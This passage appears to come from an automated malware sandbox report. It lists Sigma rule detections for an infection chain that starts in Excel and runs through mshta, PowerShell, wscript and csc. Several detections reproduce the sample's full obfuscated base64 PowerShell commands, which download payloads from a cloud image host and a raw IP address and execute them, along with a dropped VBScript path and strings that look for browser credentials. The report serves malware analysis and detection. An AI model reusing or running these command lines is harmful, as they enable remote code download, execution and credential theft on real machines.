                  • 0x65aac:$str_b18: Uploaded file:
                  • 0x65a6c:$str_b19: Unable to delete:
                  • 0x662a0:$str_b20: while fso.FileExists("
                  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 7 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcics
                  Sigma detected: File With Uncommon Extension Created By An Office Application
                  Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3312, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].hta
                  Sigma detected: Potentially Suspicious PowerShell Child Processes
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , ProcessId: 3936, ProcessName: wscript.exe
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcics
                  Sigma detected: Suspicious MSHTA Child Process
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICA
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3312, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3588, ProcessName: mshta.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , ProcessId: 3936, ProcessName: wscript.exe
                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", ProcessId: 3840, ProcessName: csc.exe
                  Sigma detected: Excel Network Connections
                  Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.150.207.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3720, TargetFilename: C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS
                  Sigma detected: Suspicious Office Outbound Connections
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 54.150.207.131, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
